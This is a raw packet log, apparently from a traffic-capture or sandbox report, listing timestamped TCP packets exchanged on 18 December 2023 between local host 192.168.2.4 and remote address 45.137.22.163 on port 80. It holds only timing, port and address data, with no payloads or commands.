                                        Dec 18, 2023 14:31:05.959367037 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.959403992 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.959418058 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.959583044 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.959595919 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.959623098 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.959772110 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.959784985 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.959815025 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.959974051 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.959988117 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.959997892 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960021973 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.960052013 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.960123062 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960135937 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960148096 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960175037 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.960298061 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960310936 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960328102 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960341930 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960359097 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960364103 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.960380077 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.960494995 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960509062 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960555077 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.960784912 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960798979 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960808992 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.960835934 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.960980892 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.961154938 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.961167097 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.961179018 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.961193085 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.961203098 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.961225986 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.961338043 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.961353064 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.961388111 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.961442947 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.961491108 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.961595058 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.961661100 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.961675882 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.961709023 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.961862087 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.961874962 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.961910009 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.962034941 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962048054 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962060928 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962080002 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.962094069 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.962218046 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962230921 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962270975 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.962394953 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962409019 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962419033 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962445974 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.962574005 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962587118 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962625980 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.962735891 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962750912 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962760925 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962774038 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.962790012 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.963032961 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963047028 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963057995 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963084936 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.963123083 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.963222980 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963237047 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963248014 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963290930 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963291883 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.963339090 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.963489056 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963501930 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963514090 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963536024 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.963650942 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963661909 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963689089 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.963851929 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963865042 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.963906050 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.964014053 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964027882 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964037895 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964071035 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.964082956 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964097023 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964107990 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964144945 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.964154005 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964191914 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.964346886 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964359999 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964401960 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.964529037 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964540958 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964551926 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964581966 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.964672089 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964685917 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964696884 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964709044 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964740038 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.964751959 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.964757919 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964771032 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964826107 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.964950085 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.964962959 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965003014 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.965115070 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965127945 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965138912 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965152025 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965164900 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965167999 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.965204954 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.965394020 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965408087 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965439081 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.965528965 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965576887 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.965679884 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965692997 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965704918 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965749979 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.965938091 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965951920 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965964079 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965976000 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.965997934 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.966022015 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.966120005 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966133118 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966147900 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966161013 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966183901 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.966213942 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.966384888 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966398001 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966409922 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966417074 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966428995 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966442108 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966454029 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.966485977 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.966509104 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.966538906 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966552019 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966563940 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966576099 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966588974 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966602087 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966614008 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966623068 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.966664076 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.966728926 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966746092 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966758013 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966769934 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966783047 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966794014 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.966825008 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.966886997 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966901064 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966913939 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966922998 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.966928005 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966939926 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.966964960 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.966989994 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.967073917 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967087984 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967098951 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967132092 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.967237949 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967252016 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967269897 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967283964 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967288017 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.967298031 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967302084 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.967310905 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967324018 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967335939 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967351913 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.967380047 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.967505932 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967518091 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967529058 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967547894 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.967577934 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.967675924 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967686892 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967698097 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967709064 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967720032 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967734098 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.967740059 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967757940 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.967782974 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.967942953 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967955112 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.967993975 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.968116999 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968128920 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968139887 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968151093 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968161106 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968168974 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.968173027 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968179941 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968190908 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968219995 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.968238115 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.968291044 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968302965 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968314886 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968326092 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968350887 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.968458891 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968470097 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968478918 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.968496084 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.013499022 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.016154051 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.060400009 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.191032887 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.191073895 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.191131115 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.191143990 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.191221952 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.191267967 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.191289902 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.191627979 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.191720009 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.191773891 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.191813946 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.191894054 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.191937923 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.191945076 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.192018986 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.192080975 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.192087889 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.192100048 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.192208052 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.192270994 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.192588091 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.192683935 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.192753077 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.192811012 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.192837954 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.192900896 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.192941904 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.192996979 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193049908 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.193080902 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193129063 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193140984 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193181992 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.193240881 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193254948 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193314075 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.193330050 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193398952 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193450928 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.193465948 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193479061 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193547964 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193598986 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.193615913 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193667889 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193696022 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193720102 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.193783045 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193839073 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193875074 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193891048 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.193937063 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193978071 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.193985939 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.194046974 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194113016 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194160938 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194175959 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.194236994 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194247007 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194286108 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.194360971 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194447041 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194503069 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.194509029 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194578886 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194590092 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194628000 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.194648027 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194694996 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194705009 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194744110 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.194830894 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194896936 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.194947958 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.195022106 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195144892 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195198059 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195245981 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195249081 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.195324898 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195336103 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195382118 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195388079 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.195436001 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195507050 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195559025 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.195586920 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195597887 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195664883 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.195703030 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195754051 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195774078 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195800066 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.195868969 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.195940971 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.196007967 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.196053982 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.196067095 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.196078062 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.196137905 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.196516991 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.196579933 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.196631908 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.196660042 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.196698904 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.196747065 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.196767092 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:06.196775913 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:06.196821928 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:07.737888098 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:19.509932995 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:19.751070023 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:19.751249075 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:19.751796961 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:19.994237900 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:19.994280100 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:19.994312048 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:19.994396925 CET4973080192.168.2.445.137.22.163
